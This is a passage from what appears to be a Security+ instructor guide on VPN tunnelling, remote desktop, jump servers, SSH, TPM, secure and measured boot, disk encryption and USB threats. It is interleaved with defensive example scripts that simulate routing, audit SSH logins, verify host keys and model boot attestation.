Traditional remote access VPN solutions require the user to initiate the connection and enter their authentication credentials. An always-on VPN means that the computer establishes the VPN whenever an Internet connection over a trusted network is detected, using the user's cached credentials to authenticate. Microsoft has an Always On VPN solution for Windows Server and Windows clients (docs.microsoft.com/en-us/windows-server/remote/remote-access/vpn/always-on-vpn/deploy/always-on-vpn-deploy-deployment) and an OpenVPN client can be configured to autoconnect (openvpn.net/vpn-server-resources/setting-your-client-to-automatically-connect-to-your-vpn-when-your-computer-starts).


Split Tunnel versus Full Tunnel

When a client connected to a remote access VPN tries to access other sites on the Internet, there are two ways to manage the connection:

• Split tunnel: the client accesses the Internet directly using its native IP configuration and DNS servers.

Split tunnel VPN traffic flow. (Images © 123RF.com.)

• Full tunnel: Internet access is mediated by the corporate network, which will alter the client's IP address and DNS servers and may use a proxy.

Full tunnel offers better security, but the network address translations and DNS operations required may cause problems with some websites, especially cloud services. It also means more data is channeled over the link.

Full tunnel VPN traffic flow. (Images © 123RF.com.)
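The routing decision behind the two models, as an added example in POSIX shell (not code from the guide or from any VPN product): the route tables, the corporate prefix 10.0.0.0/8, the client's home LAN 192.168.1.0/24, and the interface names are constructed, and the full-tunnel route pair 0.0.0.0/1 plus 128.0.0.0/1 follows what OpenVPN's redirect-gateway def1 option pushes. It goes slightly beyond the text by showing that even under a full tunnel a more specific local route still wins.

```sh
#!/bin/sh
# Added example (not from the CompTIA guide): shows how the routes a VPN gateway
# pushes decide whether a client sends each packet directly or through the
# tunnel.  The corporate prefix, interface names and route tables are
# constructed.  The full-tunnel pair 0.0.0.0/1 + 128.0.0.0/1 is the trick
# OpenVPN's "redirect-gateway def1" uses: two more-specific routes override the
# client's existing default route without deleting it.

# Dotted quad -> 32-bit integer.
ip2int() {
    printf '%s\n' "$1" | {
        IFS=. read -r a b c d
        echo $(( (a << 24) | (b << 16) | (c << 8) | d ))
    }
}

# Is address $1 inside prefix $2 (written a.b.c.d/n)?
in_cidr() {
    net=${2%/*}; cbits=${2#*/}
    [ "$cbits" -eq 0 ] && return 0
    mask=$(( (4294967295 << (32 - cbits)) & 4294967295 ))
    [ $(( $(ip2int "$1") & mask )) -eq $(( $(ip2int "$net") & mask )) ]
}

# Route tables as "prefix=interface" entries (constructed).  tun0 is the VPN
# adapter; eth0 is the client's physical connection, which keeps its LAN route
# and its default route in both cases.
SPLIT_ROUTES='10.0.0.0/8=tun0'
FULL_ROUTES='0.0.0.0/1=tun0 128.0.0.0/1=tun0 10.0.0.0/8=tun0'
LOCAL_ROUTES='192.168.1.0/24=eth0 0.0.0.0/0=eth0'

# Interface a packet to $2 leaves on under tunnel mode $1 (split|full),
# using longest-prefix match as the kernel does.
route_for() {
    if [ "$1" = full ]; then routes=$FULL_ROUTES; else routes=$SPLIT_ROUTES; fi
    best_bits=-1; best_if=none
    for entry in $routes $LOCAL_ROUTES; do
        prefix=${entry%=*}; iface=${entry#*=}; bits=${prefix#*/}
        if in_cidr "$2" "$prefix" && [ "$bits" -gt "$best_bits" ]; then
            best_bits=$bits; best_if=$iface
        fi
    done
    echo "$best_if"
}

for dest in 10.1.0.20 203.0.113.80 192.168.1.1; do
    echo "$dest: split -> $(route_for split "$dest"), full -> $(route_for full "$dest")"
done
# 10.1.0.20:    split -> tun0, full -> tun0   (corporate server)
# 203.0.113.80: split -> eth0, full -> tun0   (Internet site)
# 192.168.1.1:  split -> eth0, full -> eth0   (home LAN; /24 beats /1)
```

The third destination is the practical caveat behind "full tunnel offers better security": the client's own LAN remains reachable unless the VPN client or policy also blocks local routes.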


Remote Desktop

Show Slide(s): Remote Desktop

Teaching Tip: RDP gateways and HTML5 clientless VPNs are not VPN solutions in the traditional sense. Rather than connecting a remote client to a local network, they provide access to a real or virtual desktop or app within the local network. Rather than tunneling all network traffic from a remote client, they just tunnel the HID traffic in and the audio/video out.

A remote access VPN joins the user's PC or smartphone to the local network, via the secure tunnel. Another model for remote networking involves connecting to a host within the local network over a remote administration protocol. A protocol such as Secure Shell (SSH) only supports terminal access, but there are many other tools that can connect to a graphical desktop. A GUI remote administration tool sends screen and audio data from the remote host to the client and transfers mouse and keyboard input from the client to the remote host.

Microsoft's Remote Desktop Protocol (RDP) can be used to access a physical machine on a one-to-one basis. Alternatively, the site can operate a remote desktop gateway that facilitates access to virtual desktops or individual apps running on the network servers (docs.microsoft.com/en-us/windows-server/remote/remote-desktop-services/welcome-to-rds). There are several popular alternatives to Remote Desktop. Most support remote access to platforms other than Windows (macOS and iOS, Linux, Chrome OS, and Android for instance). Examples include TeamViewer (teamviewer.com/en) and Virtual Network Computing (VNC), which is implemented by several different providers (notably realvnc.com/en).

Traditionally, these remote desktop products require a client app. The canvas element introduced in HTML5 allows a browser to draw and update a desktop with relatively little lag. It can also handle audio. This is referred to as an HTML5 VPN or as a clientless remote desktop gateway (guacamole.apache.org). This solution also uses a protocol called WebSockets, which enables bidirectional messages to be sent between the server and client without requiring the overhead of separate HTTP requests.

Out-of-Band Management and Jump Servers

Show Slide(s): Out-of-Band Management and Jump Servers

Teaching Tip: You might want to point out another use case for jump servers: to provide multiple hops through to backend servers in the cloud.

Remote access management refers to the specific use case of using a secure channel to administer a network appliance or server. The secure admin workstations (SAWs) used to perform management functions must be tightly locked down, ideally installed with no software other than that required to access the administrative channel (minimal web browser, remote desktop client, or virtual terminal, for instance). SAWs should be denied Internet access or be restricted to a handful of approved vendor sites (for patches, drivers, and support). The devices must also be subject to stringent access control and auditing so that any misuse is detected at the earliest opportunity.

Out-of-Band Management

Remote management methods can be described as either in-band or out-of-band (OOB). An in-band management link is one that shares traffic with other communications on the production network. A serial console or modem port on a router is a physically out-of-band management method. When using a browser-based management interface or a virtual terminal over Ethernet and IP, the link can be made out-of-band by connecting the port used for management access to physically separate network infrastructure. This can be costly to implement, but out-of-band management is more secure and means that access to the device is preserved when there are problems affecting the production network. With an in-band connection, better security can be implemented by using a VLAN to isolate management traffic. This makes it harder for potential eavesdroppers to view or modify traffic passing over the management interface. This sort of virtual OOB does still mean that access could be compromised by a system-wide network failure, however.

Jump Servers

One of the challenges of managing hosts that are exposed to the Internet, such as in a DMZ or cloud virtual network, is to provide administrative access to the servers and appliances located within it. On the one hand, a link is necessary; on the other, the administrative interface could be compromised and exploited as a pivot point into the rest of the network. Consequently, the management hosts permitted to access administrative interfaces on hosts in the secure zone must be tightly controlled. Configuring and auditing this type of control when there are many different servers operating in the zone is complex.

One solution to this complexity is to add a single administration server, or jump server, to the secure zone. The jump server only runs the necessary administrative port and protocol (typically SSH or RDP). Administrators connect to the jump server then use the jump server to connect to the admin interface on the application server. The application server's admin interface has a single entry in its ACL (the jump server) and denies connection attempts from any other hosts.
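One audit that follows directly from the single-entry ACL is to look for logins on the application server that did not come through the jump server. The shell script below is an added example, not code from the guide: it runs that check over constructed sshd log lines (the host name app01, the addresses, process IDs, and fingerprints are made up, and 10.1.0.5 is assumed to be the jump server).

```sh
#!/bin/sh
# Added example (not from the CompTIA guide): audits SSH login records on an
# application server against the rule that only the jump server may reach its
# admin interface.  The log lines are constructed in the format OpenSSH writes
# to the system log (auth.log / journal); the addresses are documentation ranges.

JUMP_SERVER=10.1.0.5   # the one host allowed by the admin interface ACL (constructed)

# Constructed sshd log lines for application server app01.
AUTH_LOG='Aug 30 09:01:12 app01 sshd[2211]: Accepted publickey for admin from 10.1.0.5 port 51022 ssh2: ED25519 SHA256:constructedfp1
Aug 30 09:14:47 app01 sshd[2290]: Accepted publickey for admin from 10.1.0.5 port 51100 ssh2: ED25519 SHA256:constructedfp1
Aug 30 10:02:03 app01 sshd[2401]: Accepted password for admin from 203.0.113.44 port 40211 ssh2
Aug 30 10:02:09 app01 sshd[2402]: Failed password for root from 198.51.100.7 port 33001 ssh2
Aug 30 10:05:31 app01 sshd[2410]: Accepted publickey for deploy from 10.1.0.9 port 52000 ssh2: RSA SHA256:constructedfp2'

# Successful logins that did not arrive via the jump server, printed as
# "<user> <source-ip> <method>".  Field positions follow the sshd message
# layout: $6 = Accepted/Failed, $7 = method, $9 = user, $11 = source address.
# The $10 == "from" guard skips "invalid user" lines, whose fields shift.
logins_bypassing_jump() {
    printf '%s\n' "$AUTH_LOG" | awk -v jump="$JUMP_SERVER" '
        $6 == "Accepted" && $10 == "from" && $11 != jump { print $9, $11, $7 }'
}

# How many such logins occurred (the number an alert rule would threshold on).
bypass_count() {
    logins_bypassing_jump | awk 'END { print NR }'
}

# Failed attempts from outside the jump server: not a breach of the ACL by
# themselves, but evidence that the admin port is reachable from elsewhere.
failed_from_elsewhere() {
    printf '%s\n' "$AUTH_LOG" | awk -v jump="$JUMP_SERVER" '
        $6 == "Failed" && $10 == "from" && $11 != jump { print $9, $11 }'
}

echo "Logins bypassing the jump server ($(bypass_count)):"
logins_bypassing_jump
echo "Failed attempts from non-jump hosts:"
failed_from_elsewhere
```

Both findings in the sample point at the same control gap: the admin interface accepted connections (one of them by password) from hosts other than the jump server, so the ACL is not being enforced where the traffic actually arrives.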

Secure Shell

Show Slide(s): Secure Shell

Securing management traffic using a jump server.

Teaching Tip: SSH is primarily for UNIX/Linux, though there are Windows versions. Windows can also use the proprietary Windows Remote Management (WinRM) and Windows Remote Shell (WinRS). Make sure students understand the difference between identifying a server via its host key, and connecting to the server using a client public key.

Secure Shell (SSH) is the principal means of obtaining secure remote access to a command line terminal. The main uses of SSH are for remote administration and secure file transfer (SFTP). There are numerous commercial and open source products available for all the major NOS platforms. The most widely used is OpenSSH (openssh.com).

SSH servers are identified by a public/private key pair (the host key). A mapping of host names to public keys can be kept manually by each client or there are various enterprise software products designed for host key management.


Confirming the SSH server's host key using the PuTTY SSH client. (Screenshot used with permission from PuTTY.)

The host key must be changed if any compromise of the host is suspected. If an attacker has obtained the private key of a server or appliance, they can masquerade as that server or appliance and perform a man-in-the-middle attack, usually with a view to obtaining other network credentials.

The server's host key is used to set up a secure channel to use for the client to submit authentication credentials.
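The host key check described above, as an added example in shell (not code from the guide or from OpenSSH): it looks a server up in a constructed known_hosts file and compares fingerprints, returning a different result for a matching key, a changed key, and an unknown host. The key blobs are constructed base64 strings rather than real keys, and the host name vpn-gw.example.com and its address are made up.

```sh
#!/bin/sh
# Added example (not from the CompTIA guide): checks the host key presented by
# an SSH server against the client's known_hosts file, the decision a client
# must make before it sends any credentials.  The key blobs are constructed
# base64 strings standing in for real key material; the comparison logic is
# the same.  The known_hosts file is written to a temporary path.

KH_FILE=$(mktemp)
KNOWN_BLOB=$(printf 'constructed ed25519 host key for vpn-gw' | base64 | tr -d '\n')
ROGUE_BLOB=$(printf 'constructed key presented by an impostor host' | base64 | tr -d '\n')

# Constructed known_hosts with one unhashed entry listing both a name and an IP.
cat >"$KH_FILE" <<EOF
# known_hosts (constructed sample)
vpn-gw.example.com,10.1.0.1 ssh-ed25519 $KNOWN_BLOB
EOF

# SHA-256 of the raw key blob, hex.  OpenSSH shows the same digest in base64
# as "SHA256:..." in its host key prompt.
key_fingerprint() {
    printf '%s' "$1" | base64 -d | sha256sum | cut -d' ' -f1
}

# Look up the stored key of type $3 for host $2 in known_hosts $1.  Entries
# may list several names separated by commas; comments start with "#".
known_hosts_blob() {
    awk -v h="$2" -v t="$3" '
        /^#/ || NF < 3 || $2 != t { next }
        {
            n = split($1, names, ",")
            for (i = 1; i <= n; i++) if (names[i] == h) { print $3; exit }
        }' "$1"
}

# Verify the presented key $4 of type $3 for host $2 against known_hosts $1.
# Returns 0 = match, 1 = mismatch (refuse), 2 = unknown host (confirm out of band).
verify_host_key() {
    stored=$(known_hosts_blob "$1" "$2" "$3")
    presented=$(key_fingerprint "$4")
    if [ -z "$stored" ]; then
        echo "UNKNOWN: no $3 key for $2; confirm fingerprint $presented out of band before trusting it"
        return 2
    elif [ "$(key_fingerprint "$stored")" = "$presented" ]; then
        echo "OK: $2 identified by $3 key $presented"
        return 0
    else
        echo "WARNING: $3 key for $2 does not match known_hosts (possible man-in-the-middle); not sending credentials"
        return 1
    fi
}

verify_host_key "$KH_FILE" vpn-gw.example.com ssh-ed25519 "$KNOWN_BLOB" || :   # OK
verify_host_key "$KH_FILE" vpn-gw.example.com ssh-ed25519 "$ROGUE_BLOB" || :   # WARNING (returns 1)
verify_host_key "$KH_FILE" other.example.com  ssh-ed25519 "$KNOWN_BLOB" || :   # UNKNOWN (returns 2)
```

The third outcome is the one the PuTTY dialog in the screenshot is handling: with no stored key there is nothing to compare against, so the fingerprint has to be confirmed through a channel the attacker cannot influence before it is accepted.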

SSH Client Authentication

SSH allows various methods for the client to authenticate to the SSH server. Each of these methods can be enabled or disabled as required on the server, using the /etc/ssh/sshd_config file:

• Username/password: the client submits credentials that are verified by the SSH server either against a local user database or using a RADIUS/TACACS+ server.

• Public key authentication: each remote user's public key is added to a list of keys authorized for each local account on the SSH server.

• Kerberos: the client submits the Kerberos credentials (a Ticket Granting Ticket) obtained when the user logged onto the workstation to the server using GSSAPI (Generic Security Services Application Program Interface). The SSH server contacts the Ticket Granting Service (in a Windows environment, this will be a domain controller) to validate the credential.

Managing valid client public keys is a critical security task. Many recent attacks on web servers have exploited poor key management. If a user's private key is compromised, delete the public key from the appliance then regenerate the key pair on the user's (remediated) client device and copy the public key to the SSH server. Always delete public keys if the user's access permissions have been revoked.
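Checking which of these methods a server actually allows, and removing a revoked user's key, as an added shell example (not code from the guide or from OpenSSH): the sshd_config and authorized_keys contents are constructed samples written to temporary files, and the key strings in them are not real key material. The defaults used when a keyword is absent are OpenSSH's documented ones.

```sh
#!/bin/sh
# Added example (not from the CompTIA guide): reads the effective client
# authentication settings from an sshd_config and removes a revoked user's
# key from authorized_keys.  Both files are constructed samples written to
# temporary paths; on a real server they are /etc/ssh/sshd_config and the
# account's ~/.ssh/authorized_keys, and sshd must be reloaded after editing
# the former.

CFG=$(mktemp)
cat >"$CFG" <<'EOF'
# sshd_config (constructed sample)
Port 22
PubkeyAuthentication yes
PasswordAuthentication no
KbdInteractiveAuthentication no
GSSAPIAuthentication yes
PermitRootLogin no
Match Address 10.1.0.0/24
    PasswordAuthentication yes
EOF

AK=$(mktemp)
cat >"$AK" <<'EOF'
# authorized_keys (constructed sample; key material is not real)
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGNvbnN0cnVjdGVkLWtleS1vbmUtbm90LXJlYWw bobby@laptop
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGNvbnN0cnVjdGVkLWtleS10d28tbm90LXJlYWw alice@desktop
EOF

# Value of keyword $2 in sshd_config $1, or $3 if it is not set.  sshd takes the
# first value it finds and keywords are case-insensitive; settings inside a
# Match block apply only to matching connections, so parsing stops there.
sshd_setting() {
    v=$(awk -v k="$2" '
        tolower($1) == "match" { exit }
        !/^[ \t]*#/ && tolower($1) == tolower(k) { print $2; exit }' "$1")
    if [ -n "$v" ]; then printf '%s\n' "$v"; else printf '%s\n' "$3"; fi
}

# One-line summary of the methods the text lists (defaults are OpenSSH's).
auth_summary() {
    printf 'password=%s pubkey=%s kbdinteractive=%s gssapi=%s rootlogin=%s\n' \
        "$(sshd_setting "$1" PasswordAuthentication yes)" \
        "$(sshd_setting "$1" PubkeyAuthentication yes)" \
        "$(sshd_setting "$1" KbdInteractiveAuthentication yes)" \
        "$(sshd_setting "$1" GSSAPIAuthentication no)" \
        "$(sshd_setting "$1" PermitRootLogin prohibit-password)"
}

# Number of keys in an authorized_keys file (comment lines are not keys).
key_count() {
    awk '/^(ssh-|ecdsa-|sk-)/ { n++ } END { print n + 0 }' "$1"
}

# Remove every key whose comment field (user@host) is $2 from file $1.
# Returns 0 if at least one key was removed, 1 if nothing matched.
revoke_key() {
    before=$(key_count "$1")
    awk -v c="$2" '/^#/ || NF < 3 || $3 != c' "$1" >"$1.tmp" && mv "$1.tmp" "$1"
    [ "$(key_count "$1")" -lt "$before" ]
}

auth_summary "$CFG"   # password=no pubkey=yes kbdinteractive=no gssapi=yes rootlogin=no
revoke_key "$AK" bobby@laptop && echo "revoked bobby@laptop; $(key_count "$AK") key(s) remain"
```

The Match block in the sample is the detail worth noticing: the global setting disables password login, but connections from 10.1.0.0/24 are still allowed to use it, so a review that only reads the first PasswordAuthentication line would miss that exception.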


SSH Commands

SSH commands are used to connect to hosts and set up authentication methods. To connect to an SSH server (replace <server-address> with its IP address or host name) using an account named bobby and password authentication, run:

ssh bobby@<server-address>

The following commands create a new key pair and copy it to an account on the remote server:

ssh-keygen -t rsa
ssh-copy-id bobby@<server-address>

At an SSH prompt, you can now use the standard Linux shell commands. Use exit to close the connection.

You can also use the scp command to copy a file from the remote server to the local host:

scp bobby@<server-address>:/logs/audit.log audit.log

Reverse the arguments to copy a file from the local host to the remote server. To copy the contents of a directory and any subdirectories (recursively), use the -r option.


Review Activity:
Secure Remote Access Protocols
Answer the following questions:

1. True or false? A TLS VPN can only provide access to web-based network resources.

False: a Transport Layer Security (TLS) VPN uses TLS to encapsulate the private network data and tunnel it over the network. The private network data could be frames or IP level packets and is not constrained by application layer protocol type.

2. What is Microsoft's TLS VPN solution?

The Secure Sockets Tunneling Protocol (SSTP).

3. What IPSec mode would you use for data confidentiality on a private network?

Transport mode with Encapsulating Security Payload (ESP). Tunnel mode encrypts the IP header information, but this is unnecessary on a private network. Authentication Header (AH) provides message authentication and integrity but not confidentiality.

4. Which protocol is often used in conjunction with IPSec to provide a remote access client VPN with user authentication?

Layer 2 Tunneling Protocol (L2TP).

5. What is the main advantage of IKE v2 over IKE v1?

Rather than just providing mutual authentication of the host endpoints, IKE v2 supports a user account authentication method, such as Extensible Authentication Protocol (EAP).

6. What bit of information confirms the identity of an SSH server to a client?

The server's public key (host key). Note that this can only be trusted if the client trusts that the public key is valid. The client might confirm this manually or using a Certificate Authority.


Lesson 11
Summary

You should be able to configure secure protocols for local network access and management, application services, and remote access and management.

Teaching Tip: Check that students are confident about the content that has been covered. If there is time, re-visit any content examples that they have questions about. If you have used all the available time for this lesson block, note the issues, and schedule time for a review later in the course.

Guidelines for Implementing Secure Network Protocols

Follow these guidelines when you implement or reconfigure network protocols:

• Ensure availability for critical network address allocation (DHCP), name resolution (DNS), directory access (LDAP), and time synchronization (NTP) services. Monitor the network to detect and remove rogue services.

• Consider using SNMP for monitoring service availability.

• Assess the requirements for securing an application protocol, such as certificates or shared keys for authentication and TCP/UDP port usage. Ensure secure distribution of credentials and create configuration documentation for secure usage.

• Deploy certificates to web servers to use with HTTPS.

• Deploy certificates to email servers to use with secure SMTP, POP, and IMAP.

• Deploy certificates or host keys to file servers to use with FTPS or SFTP.

• Deploy certificates to email clients to use with S/MIME.

• Deploy certificates to VoIP gateways and endpoints to use with SIPS and SRTP.

• Deploy certificates or shared keys to VPN gateways and clients for use with TLS VPNs, IPSec, and L2TP/IPSec.

• Configure RDP gateways and SSH servers with certificates or host keys. Configure client authentication using user credentials or public keys.

• Implement SAWs and out-of-band network interfaces or jump servers for secure remote management of servers and network infrastructure.

Lesson 12
Implementing Host Security Solutions

LESSON INTRODUCTION

Teaching Tip: Still pursuing the protect infrastructure theme, this lesson focuses on endpoint security. Ordinary hosts and embedded systems are covered here, while mobile is discussed in the following lesson. This lesson covers a lot of material that is difficult to support with lab work so make sure you allocate plenty of time to covering it.

Effective network architecture design, protocol configuration, and the use of appliances such as firewalls and intrusion detection help to provide a secure network environment, but we also need to consider the security systems configured on network hosts as well. Security procedures and solutions are complicated by the range of different types of hosts that networks must support, from PCs and laptops to smartphones and embedded controllers.

Lesson Objectives

In this lesson, you will:

• Implement secure firmware.

• Implement endpoint security.

• Explain embedded system security implications.


Topic 12A
Implement Secure Firmware

EXAM OBJECTIVES COVERED
1.2 Given a scenario, analyze potential indicators to determine the type of attack
3.2 Given a scenario, implement host or application security solutions
5.3 Explain the importance of policies to organizational security

Teaching Tip: As well as PC hardware and firmware security, this topic covers flash media attacks, and looks at the third party supply chain content examples from 1.2 and 5.3.

The security of the hardware underpinning our network and computing devices is often overlooked. In part, this is because it is difficult for most companies to make their own investigations in this area. They have to rely on the market and security agencies to identify bad actors in supply chains. Nevertheless, it is important that you understand the issues involved in secure systems design so that you can evaluate product offerings and make recommendations for purchasing and device configuration.

Hardware Root of Trust

Show Slide(s): Hardware Root of Trust

Teaching Tip: Students should understand that a chain of trust from the hardware through to the kernel and drivers is a prerequisite for enforcing access controls. You might want to mention The Trusted Computing Group (trustedcomputinggroup.org) as the driver for many of these standards and technologies.

A hardware Root of Trust (RoT) or trust anchor is a secure subsystem that is able to provide attestation. Attestation means that a statement made by the system can be trusted by the receiver. For example, when a computer joins a network, it might submit a report to the network access control (NAC) server declaring, "My operating system files have not been replaced with malicious versions." The hardware root of trust is used to scan the boot metrics and OS files to verify their signatures, then it signs the report. The NAC server can trust the signature and therefore the report contents if it can trust that the signing entity's private key is secure.

The RoT is usually established by a type of cryptoprocessor called a trusted platform module (TPM). TPM is a specification for hardware-based storage of encryption keys, hashed passwords, and other user and platform identification information. The TPM is implemented either as part of the chipset or as an embedded function of the CPU.

Each TPM is hard-coded with a unique, unchangeable asymmetric private key called the endorsement key. This endorsement key is used to create various other types of subkeys used in key storage, signature, and encryption operations. The TPM also supports the concept of an owner, usually identified by a password (though this is not mandatory). Anyone with administrative control over the setup program can take ownership of the TPM, which destroys and then regenerates its subkeys. A TPM can be managed in Windows via the tpm.msc console or through group policy. On an enterprise network, provisioning keys to the TPM might be centrally managed via the Key Management Interoperability Protocol (KMIP).

Lesson 12: Implementing Host Security Solutions | Topic 12A


Show Slide(s): Boot Integrity

Configuring a Trusted Platform Module using system setup on an HP workstation. (Screenshot used with permission from HP.)

Teaching Tip: We assume that students know what UEFI is from A+. If not, consider explaining the difference between BIOS and UEFI, though BIOS motherboards are increasingly scarce. Explain how UEFI is accessed and configured. Make sure students can distinguish secure boot from measured boot. Secure boot is about provisioning certificates for trusted operating systems and blocking unauthorized OSes. Measured boot stores and compares hashes of critical boot files to detect unauthorized processes. Attestation is the process of sending a signed boot log or report to a remote server.

The problem with establishing a hardware root of trust is that devices are used in environments where anyone can get complete control over them. There cannot be complete assurance that the firmware underpinning the hardware root of trust is inviolable, but attacks against trusted modules are sufficiently difficult so as to provide effective security in most cases.

Boot Integrity

Most PCs and smartphones implement the unified extensible firmware interface (UEFI). UEFI provides code that allows the host to boot to an OS. UEFI can enforce a number of boot integrity checks.

Secure Boot

Secure boot is designed to prevent a computer from being hijacked by a malicious OS. UEFI is configured with digital certificates from valid vendors. The system firmware checks the operating system boot loader and kernel using the stored certificate to ensure that it has been digitally signed by the vendor. This prevents a boot loader or kernel that has been changed by malware (or an OS installed without authorization) from being used. Secure boot is supported on Windows (docs.microsoft.com/en-us/windows/security/information-protection/secure-the-windows-boot-process) and many Linux platforms (wiki.ubuntu.com/UEFI/SecureBoot). Secure boot requires UEFI, but does not require a TPM.

Measured Boot

A trusted or measured boot process uses platform configuration registers (PCRs) in the TPM at each stage in the boot process to check whether hashes of key system state data (boot firmware, boot loader, kernel, and critical drivers) have changed. This does not usually prevent boot, but it will record the presence of unsigned kernel-level code.

Boot Attestation

Boot attestation is the capability to transmit a boot log report signed by the TPM via a trusted process to a remote server, such as a network access control server. The boot log can be analyzed for signs of compromise, such as the presence of unsigned drivers. The host can be prevented from accessing the network if it does not meet the required health policy or if no attestation report is received.
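An added example (not code from the CompTIA guide) of the measured boot and attestation flow described above: each boot stage is hashed into a PCR by chained extend operations, the TPM signs the PCR together with the server's nonce, and the NAC server replays the boot log and compares the PCR with a known-good value. The stage images, golden values and attestation key are constructed, and HMAC stands in for the TPM's asymmetric attestation key.

```python
"""Measured boot and boot attestation, simulated.

Added example (not code from the CompTIA guide): models how PCR extends
chain the hashes of each boot stage and how a NAC/attestation server checks
the signed boot report. Stage images, the golden values and the attestation
key are all constructed sample data."""
import hashlib
import hmac

PCR_SIZE = 32  # a SHA-256 PCR is 32 bytes and starts at all zeros

# Constructed sample boot chain: (stage name, bytes of the component image).
KNOWN_GOOD_STAGES = [
    ("boot_firmware", b"UEFI firmware image, vendor signed"),
    ("boot_loader", b"boot loader image, vendor signed"),
    ("kernel", b"kernel image, vendor signed"),
    ("driver:storage", b"storage driver, vendor signed"),
]

# Stand-in for the TPM's attestation key. A real TPM signs with an asymmetric
# key whose public half the server trusts; HMAC keeps this example stdlib-only.
TPM_ATTESTATION_KEY = b"constructed-demo-attestation-key"


def extend(pcr: bytes, measurement_digest: bytes) -> bytes:
    """PCR extend as a TPM does it: new = SHA-256(old || digest).

    Because each value depends on every earlier one, a change in any stage
    changes the final PCR, and the order of stages matters."""
    return hashlib.sha256(pcr + measurement_digest).digest()


def measured_boot(stages):
    """Client side: hash each stage before it runs, extend the PCR with it and
    append the digest to the boot log. Returns (final_pcr, boot_log)."""
    pcr = bytes(PCR_SIZE)
    boot_log = []
    for name, image in stages:
        digest = hashlib.sha256(image).digest()
        boot_log.append((name, digest.hex()))
        pcr = extend(pcr, digest)
    return pcr, boot_log


def quote(pcr: bytes, nonce: bytes) -> bytes:
    """Client side: the TPM signs the PCR together with the server's nonce so a
    captured report cannot be replayed later."""
    return hmac.new(TPM_ATTESTATION_KEY, pcr + nonce, hashlib.sha256).digest()


def replay_log(boot_log) -> bytes:
    """Server side: recompute the PCR that this boot log should produce."""
    pcr = bytes(PCR_SIZE)
    for _, digest_hex in boot_log:
        pcr = extend(pcr, bytes.fromhex(digest_hex))
    return pcr


def verify_attestation(pcr, boot_log, nonce, signature, golden_pcr):
    """Server side health check. Returns (ok, reason)."""
    if not hmac.compare_digest(quote(pcr, nonce), signature):
        return False, "bad signature or stale nonce"
    if replay_log(boot_log) != pcr:
        return False, "boot log does not match PCR"
    if pcr != golden_pcr:
        return False, "boot components differ from baseline"
    return True, "healthy"


def first_changed_stage(boot_log, golden_log):
    """Name the earliest stage whose digest differs from the golden log, so
    the analyst knows which component (e.g. an unsigned driver) to look at."""
    for (name, digest), (_, golden) in zip(boot_log, golden_log):
        if digest != golden:
            return name
    return None


if __name__ == "__main__":
    golden_pcr, golden_log = measured_boot(KNOWN_GOOD_STAGES)
    nonce = b"server-nonce-0001"

    pcr, log = measured_boot(KNOWN_GOOD_STAGES)
    print("clean host:", verify_attestation(pcr, log, nonce, quote(pcr, nonce), golden_pcr))

    # Same host after its boot loader was replaced: the TPM still signs
    # faithfully, but the PCR no longer matches the baseline.
    tampered = list(KNOWN_GOOD_STAGES)
    tampered[1] = ("boot_loader", b"boot loader image, modified")
    pcr, log = measured_boot(tampered)
    print("tampered host:", verify_attestation(pcr, log, nonce, quote(pcr, nonce), golden_pcr),
          "changed stage:", first_changed_stage(log, golden_log))
```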

Show Slide(s): Disk Encryption

Teaching Tip: Opal is complex, with different options for consumer and enterprise grades. Students can refer to the white paper and TCG slides for more detail. This should not be required for the exam, but if you want to give an overview, note that enterprise grades support multiple locking ranges that can be associated with different DEKs and users. There is also a parallel specification (TCG Storage Security Subsystem Class: Enterprise) aimed at SCSI/SAS devices. Note that SED is one of the best methods of media sanitization, via the Crypto Erase function. We'll discuss sanitization at the end of the course.

Configuring secure boot settings via an HP workstation's UEFI firmware setup program. (Screenshot used with permission from HP.)

Disk Encryption

Full disk encryption (FDE) means that the entire contents of the drive (or volume), including system files and folders, are encrypted. ACL-based security measures are quite simple to circumvent if an adversary can attach the drive to a different host OS. Drive encryption allays this security concern by making the contents of the drive accessible only in combination with the correct encryption key. Disk encryption can be applied to both hard disk drives (HDDs) and solid state drives (SSDs).

FDE requires the secure storage of the key used to encrypt the drive contents. Normally, this is stored in a TPM. The TPM chip has a secure storage area that a disk encryption program, such as Windows BitLocker, can write its keys to. It is also possible to use a removable USB drive (if USB is a boot device option). As part of the setup process, you create a recovery password or key. This can be used if the disk is moved to another computer or the TPM is damaged.


Activating BitLocker drive encryption. (Screenshot used with permission from Microsoft.)

One of the drawbacks of FDE is that, because the OS performs the cryptographic operations, performance is reduced. This issue is mitigated by self-encrypting drives (SED), where the cryptographic operations are performed by the drive controller. The SED uses a symmetric data/media encryption key (DEK/MEK) for bulk encryption and stores the DEK securely by encrypting it with an asymmetric key pair called either the authentication key (AK) or key encryption key (KEK). Use of the AK is authenticated by the user password. This means that the user password can be changed without having to decrypt and re-encrypt the drive. Early types of SEDs used proprietary mechanisms, but many vendors now develop to the Opal Storage Specification (nvmexpress.org/wp-content/uploads/TCGandNVMe_Joint_White_Paper-TCG_Storage_Opal_and_NVMe_FINAL.pdf), developed by the Trusted Computing Group (TCG).

As configuring passwords on individual drives is a huge challenge when more than a few machines are involved, enterprises may use the Key Management Interoperability Protocol (KMIP) along with a hardware security module (HSM) to automate the provisioning of keys (trustedcomputinggroup.org/wp-content/uploads/SWG_TCG_Enterprise-Introduction_Sept2010.pdf).

Show Slide(s): USB and Flash Drive Security

Teaching Tip: Make sure students understand the risks from USB devices and how to identify indicators of attacks.

USB and Flash Drive Security

As revealed by researcher Karsten Nohl in his BadUSB paper (srlabs.de/wp-content/uploads/SRLabs-BadUSB-BlackHat-v .pdf), exploiting the firmware of external storage devices, such as USB flash drives (and potentially any other type of firmware), presents adversaries with an incredible toolkit. The firmware can be reprogrammed to make the device look like another device class, such as a keyboard. In this case it could then be used to inject a series of keystrokes upon an attachment or work as a keylogger. The device could also be programmed to act like a network device and corrupt name resolution, redirecting the user to malicious websites.

Another example is the O.MG cable (theverge.com/apple-mac-lightning-cable-hack-mike-grover-mg-omg-cables-defcon-cybersecurity), which packs enough processing capability into an ordinary-looking Lightning cable to run an access point and keylogger.

A modified device may have visual clues that distinguish it from a mass-manufactured thumb drive or cable, but these may be difficult to spot. You should warn users of the risks and repeat the advice to never attach devices of unknown provenance to their computers and smartphones. If you suspect a device as an attack vector, observe a sandboxed lab system (sometimes referred to as a sheep dip) closely when attaching the device. Look for command prompt windows or processes such as the command interpreter starting and changes to the registry or other system files.

